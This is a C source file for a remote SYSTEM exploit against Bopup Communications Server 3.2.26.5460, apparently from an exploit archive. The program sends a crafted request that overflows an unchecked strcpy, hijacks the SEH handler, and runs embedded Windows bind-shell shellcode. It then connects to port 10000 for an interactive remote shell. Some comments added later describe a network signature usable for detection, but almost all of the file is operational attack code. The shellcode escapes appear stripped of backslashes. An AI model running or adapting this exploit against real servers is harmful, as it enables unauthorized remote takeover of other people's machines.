
# Title : Bopup Communications Server 3.2.26.5460 Remote SYSTEM Exploit
# Published : 2009-06-22
# Author : mu-b


/* bopup-down.c
 *
 * Copyright (c) 2008 by <mu-b@digit-labs.org>
 *
 * Bopup Communications Server remote SYSTEM exploit
 * by mu-b - Sat Feb 08 2008
 *
 * - Tested on: Bopup Communications Server 3.2.26.5460 (Mar 18 2009)
 *
 * .text:00407A17 lea     eax, [ebp+pkt_0x19]
 * .text:00407A1D push    eax
 * .text:00407A1E lea     eax, [ebp+var_354]
 * .text:00407A24 push    eax
 * .text:00407A25 call    _strcpy
 *
 * note: this is updated over time for newer versions, I can't be bothered
 *       making it universal nor anything else...
 *
 *    - Private Source Code -DO NOT DISTRIBUTE -
 * http://www.digit-labs.org/ -- Digit-Labs 2008!@$!
 */

#define _DEFAULT_SOURCE   /* expose select(), gethostbyname(), hstrerror() when built with -std=c11 */

#include <stdio.h>
#include <stdlib.h>

#include <errno.h>
#include <netdb.h>
#include <netinet/in.h>
#include <string.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>

#define BUF_SIZE          2048
#define BOPUP_STR_OFFSET  0x19
#define BOPUP_STR_LEN     0x348+8

#define BOPUP_POPRET      0x00401DD5

#define NOP               0x41
#define PAD               0xCC

#define DEF_PORT          19810
#define PORT_BOPUP        DEF_PORT
#define PORT_SHELL        10000

/* Payload bytes that zbuffami() copies into the request; its length is
 * taken there as sizeof (win32_x86_bind) - 1, i.e. without the string's
 * terminating NUL.  The identifier and main()'s follow-up connect to
 * PORT_SHELL (10000) indicate it is expected to open a listener on that
 * port; nothing in this file decodes its contents. */
static char win32_x86_bind[] =
  "xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24x8bx45"
  "x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5fx20x01xebx49"
  "x8bx34x8bx01xeex31xc0x99xacx84xc0x74x07xc1xcax0d"
  "x01xc2xebxf4x3bx54x24x28x75xe5x8bx5fx24x01xebx66"
  "x8bx0cx4bx8bx5fx1cx01xebx03x2cx8bx89x6cx24x1cx61"
  "xc3x31xdbx64x8bx43x30x8bx40x0cx8bx70x1cxadx8bx40"
  "x08x5ex68x8ex4ex0execx50xffxd6x66x53x66x68x33x32"
  "x68x77x73x32x5fx54xffxd0x68xcbxedxfcx3bx50xffxd6"
  "x5fx89xe5x66x81xedx08x02x55x6ax02xffxd0x68xd9x09"
  "xf5xadx57xffxd6x53x53x53x53x53x43x53x43x53xffxd0"
  "x66x68x27x10x66x53x89xe1x95x68xa4x1ax70xc7x57xff"
  "xd6x6ax10x51x55xffxd0x68xa4xadx2exe9x57xffxd6x53"
  "x55xffxd0x68xe5x49x86x49x57xffxd6x50x54x54x55xff"
  "xd0x93x68xe7x79xc6x79x57xffxd6x55xffxd0x66x6ax64"
  "x66x68x63x6dx89xe5x6ax50x59x29xccx89xe7x6ax44x89"
  "xe2x31xc0xf3xaaxfex42x2dxfex42x2cx93x8dx7ax38xab"
  "xabxabx68x72xfexb3x16xffx75x44xffxd6x5bx57x52x51"
  "x51x51x6ax01x51x51x55x51xffxd0x68xadxd9x05xcex53"
  "xffxd6x6axffxffx37xffxd0x8bx57xfcx83xc4x64xffxd6"
  "x52xffxd0x68xefxcexe0x60x53xffxd6xffxd0";

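/* Send LEN bytes from SRC on the connected socket FD.
 *
 * Returns the number of bytes send() accepted, which may be fewer than
 * LEN; the caller is responsible for checking that.  A negative LEN or a
 * send() error is fatal: the reason is printed to stderr and the process
 * exits with EXIT_FAILURE. */
static int
sock_send (int fd, char *src, int len)
{
  ssize_t n;

  /* A negative length would be converted to a huge size_t by send(). */
  if (len < 0)
    {
      fprintf (stderr, "sock_send: negative length %d\n", len);
      exit (EXIT_FAILURE);
    }

  n = send (fd, src, (size_t) len, 0);
  if (n < 0)
    {
      fprintf (stderr, "sock_send: send() - %s\n", strerror (errno));
      exit (EXIT_FAILURE);
    }

  /* 0 <= n <= len <= INT_MAX, so narrowing back to int is lossless. */
  return ((int) n);
}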

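/* Receive up to LEN bytes from the connected socket FD into DST.
 *
 * Returns the number of bytes stored; 0 means the peer closed the
 * connection.  DST is not NUL-terminated.  A negative LEN or a recv()
 * error is fatal: the reason is printed to stderr and the process exits
 * with EXIT_FAILURE. */
static int
sock_recv (int fd, char *dst, int len)
{
  ssize_t n;

  /* A negative length would be converted to a huge size_t by recv(). */
  if (len < 0)
    {
      fprintf (stderr, "sock_recv: negative length %d\n", len);
      exit (EXIT_FAILURE);
    }

  n = recv (fd, dst, (size_t) len, 0);
  if (n < 0)
    {
      fprintf (stderr, "sock_recv: recv() - %s\n", strerror (errno));
      exit (EXIT_FAILURE);
    }

  /* 0 <= n <= len <= INT_MAX, so narrowing back to int is lossless. */
  return ((int) n);
}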

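/* Interactive relay between the connected socket FD and the terminal:
 * bytes arriving on FD are written to stdout, bytes read from stdin are
 * sent to FD.
 *
 * Never returns.  Exits with EXIT_SUCCESS once the peer closes the
 * connection; on stdin EOF it stops polling stdin but keeps draining FD.
 * A select() or read() failure other than EINTR exits with EXIT_FAILURE,
 * and a descriptor outside the range select() can handle is rejected
 * up front. */
static void
shellami (int fd)
{
  ssize_t n;
  int stdin_open = 1;
  /* nfds must exceed the highest descriptor polled, whichever that is. */
  int nfds = (fd > STDIN_FILENO ? fd : STDIN_FILENO) + 1;
  fd_set rset;
  char rbuf[1024];

  /* FD_SET on a descriptor >= FD_SETSIZE writes past the end of the fd_set. */
  if (fd < 0 || fd >= FD_SETSIZE)
    {
      fprintf (stderr, "shellami: descriptor %d outside select() range\n", fd);
      exit (EXIT_FAILURE);
    }

  while (1)
    {
      FD_ZERO (&rset);
      FD_SET (fd, &rset);
      if (stdin_open)
        FD_SET (STDIN_FILENO, &rset);

      if (select (nfds, &rset, NULL, NULL, NULL) < 0)
        {
          if (errno == EINTR)
            continue;           /* interrupted by a signal: retry */
          fprintf (stderr, "shellami: select() - %s\n", strerror (errno));
          exit (EXIT_FAILURE);
        }

      if (FD_ISSET (fd, &rset))
        {
          n = sock_recv (fd, rbuf, sizeof (rbuf));
          if (n <= 0)
            {
              fprintf (stderr, "shellami: connection closed by foreign host.\n");
              exit (EXIT_SUCCESS);
            }
          /* fwrite rather than printf("%s"): the data may contain NUL bytes,
           * which would otherwise truncate the output. */
          fwrite (rbuf, 1, (size_t) n, stdout);
          fflush (stdout);
        }

      if (stdin_open && FD_ISSET (STDIN_FILENO, &rset))
        {
          n = read (STDIN_FILENO, rbuf, sizeof (rbuf));
          if (n > 0)
            sock_send (fd, rbuf, (int) n);
          else if (n == 0)
            stdin_open = 0;     /* EOF: stdin stays readable, so stop polling it */
          else if (errno != EINTR)
            {
              fprintf (stderr, "shellami: read() - %s\n", strerror (errno));
              exit (EXIT_FAILURE);
            }
        }
    }
}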

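/* Open a TCP connection to HOST (name or dotted IPv4) on PORT.
 *
 * Returns the connected descriptor, or -1 if connect() fails; in that
 * case the socket is closed and the reason has been printed to stderr.
 * A PORT outside 1..65535, a name-resolution failure, a non-IPv4 answer
 * or a socket() failure is fatal and exits with EXIT_FAILURE. */
static int
sockami (char *host, int port)
{
  struct sockaddr_in address;
  struct hostent *hp;
  int fd;

  /* htons() would silently truncate anything wider than 16 bits. */
  if (port < 1 || port > 65535)
    {
      fprintf (stderr, "sockami: port %d out of range\n", port);
      exit (EXIT_FAILURE);
    }

  if ((hp = gethostbyname (host)) == NULL)
    {
      /* gethostbyname() reports through h_errno, not errno. */
      fprintf (stderr, "sockami: gethostbyname() - %s\n", hstrerror (h_errno));
      exit (EXIT_FAILURE);
    }

  /* Only an IPv4 answer fits in sin_addr; refuse anything else instead of
   * copying h_length bytes of some other family into it. */
  if (hp->h_addrtype != AF_INET
      || hp->h_length != (int) sizeof (address.sin_addr)
      || hp->h_addr_list[0] == NULL)
    {
      fprintf (stderr, "sockami: %s did not resolve to an IPv4 address\n", host);
      exit (EXIT_FAILURE);
    }

  if ((fd = socket (AF_INET, SOCK_STREAM, 0)) == -1)
    {
      fprintf (stderr, "sockami: socket() - %s\n", strerror (errno));
      exit (EXIT_FAILURE);
    }

  memset (&address, 0, sizeof (address));
  memcpy (&address.sin_addr, hp->h_addr_list[0], sizeof (address.sin_addr));
  address.sin_family = AF_INET;
  address.sin_port = htons ((unsigned short) port);

  if (connect (fd, (struct sockaddr *) &address, sizeof (address)) < 0)
    {
      fprintf (stderr, "sockami: connect() - %s\n", strerror (errno));
      close (fd);               /* the descriptor was leaked on this path */
      return (-1);
    }

  return (fd);
}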

/* Fill ZBUF with the request main() sends to PORT_BOPUP: a 4-byte header,
 * PAD bytes up to BOPUP_STR_OFFSET, then BOPUP_STR_LEN bytes of NOP fill
 * into which win32_x86_bind, a few fixed bytes and BOPUP_POPRET are written.
 * The total, BOPUP_STR_OFFSET + BOPUP_STR_LEN (0x369 bytes), is what the
 * unchecked strcpy() quoted in the file header (destination is an
 * ebp-relative stack local) copies; that missing length check is the defect
 * this program triggers.  ZBUF must hold at least BOPUP_STR_OFFSET +
 * BOPUP_STR_LEN bytes; main() passes a BUF_SIZE (2048) array. */
static void
zbuffami (char *zbuf)
{
  char *ptr, *j_ptr;

  ptr = zbuf;
  memcpy (ptr, "x01x00x00x00", sizeof (int));
  memset (ptr + sizeof (int), PAD, BOPUP_STR_OFFSET - sizeof (int));
  memset (ptr + BOPUP_STR_OFFSET, NOP, BOPUP_STR_LEN);

  /* ptr: 8 bytes before the end of the request; j_ptr: 32 bytes before ptr.
   * The payload is placed so that it ends immediately before j_ptr. */
  ptr += BOPUP_STR_OFFSET + BOPUP_STR_LEN - 8;
  j_ptr = ptr - 32;
  memcpy (j_ptr - (sizeof (win32_x86_bind)) + 1, win32_x86_bind,
          sizeof (win32_x86_bind) - 1);

  /* Five bytes at j_ptr; the last four are the little-endian encoding of
   * -(payload length + 5), built byte by byte with unsigned arithmetic. */
  *j_ptr++ = 'xe9';
  *j_ptr++ = (-(sizeof (win32_x86_bind) - 1 + 5) & 0x000000ff);
  *j_ptr++ = (-(sizeof (win32_x86_bind) - 1 + 5) & 0x0000ff00) >> 8;
  *j_ptr++ = (-(sizeof (win32_x86_bind) - 1 + 5) & 0x00ff0000) >> 16;
  *j_ptr++ = (-(sizeof (win32_x86_bind) - 1 + 5) & 0xff000000) >> 24;

  /* Last eight bytes of the request: four fixed bytes, then BOPUP_POPRET. */
  *ptr++ = 'xeb';
  *ptr++ = 'xde';
  *ptr++ = 0x90;
  *ptr++ = 0x90;
  /* NOTE(review): this stores through a cast char* -> unsigned int*, which is
   * a strict-aliasing and (on strict targets) alignment problem; a 4-byte
   * memcpy of BOPUP_POPRET would be the well-defined form. */
  *(unsigned int *) ptr = BOPUP_POPRET;
}

/* Entry point.  Connects to <host>:PORT_BOPUP, sends the oversized request
 * built by zbuffami(), closes that connection, waits two seconds, then tries
 * to connect to <host>:PORT_SHELL and hands the socket to shellami().
 *
 * Network-visible sequence, useful when writing detections: one short TCP
 * session to 19810 carrying a single 0x369-byte write that is mostly 0x41
 * fill, followed about 2 s later by a connect from the same client to 10000
 * on the same host.  The steps are order-dependent (close before reconnect),
 * so the code is left as written and only annotated here. */
int
main (int argc, char **argv)
{
  char zbuf[BUF_SIZE];
  int fd, n;

  printf ("Bopup Communications Server remote SYSTEM exploitn"
          "by: <mu-b@digit-labs.org>n"
          "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!nn");

  /* Usage error exits with EXIT_SUCCESS, unlike every other failure below. */
  if (argc <= 1)
    {
      fprintf (stderr, "Usage: %s <host>n", argv[0]);
      exit (EXIT_SUCCESS);
    }

  /* sockami() has already printed the reason when it returns -1. */
  fd = sockami (argv[1], PORT_BOPUP);
  if (fd == -1)
    {
      fprintf (stderr, "%s: sockami failedn", argv[0]);
      exit (EXIT_FAILURE);
    }

  printf ("* connected to %s:%dnn", argv[1], PORT_BOPUP);

  printf ("** SEH offset @+%04Xn", BOPUP_STR_OFFSET + BOPUP_STR_LEN - 8);
  printf ("** return addy @0x%08Xnn", BOPUP_POPRET);

  /* BOPUP_STR_OFFSET + BOPUP_STR_LEN = 0x369 bytes, well within BUF_SIZE. */
  printf ("* building buffer with shellcode...");
  zbuffami (zbuf);
  printf ("donen");

  /* sock_send() may return a short count; anything but the full length is fatal. */
  printf ("* sending request...");
  if ((n = sock_send (fd, zbuf, BOPUP_STR_OFFSET + BOPUP_STR_LEN)) != BOPUP_STR_OFFSET + BOPUP_STR_LEN)
    {
      fprintf (stderr, "%s: sock_send returned %d (!= %d)n",
               argv[0], n, BOPUP_STR_OFFSET + BOPUP_STR_LEN);
      exit (EXIT_FAILURE);
    }
  printf ("donen");
  /* The first session is dropped; the second connect below is a new one. */
  close (fd);

  printf ("* waiting for the shellcode to be executed...n");
  sleep (2);

  /* A refused connect here simply ends the program with EXIT_SUCCESS. */
  if ((fd = sockami (argv[1], PORT_SHELL)) != -1)
    {
      printf ("+Wh00t!nn");
      shellami (fd);
    }

  return (EXIT_SUCCESS);
}
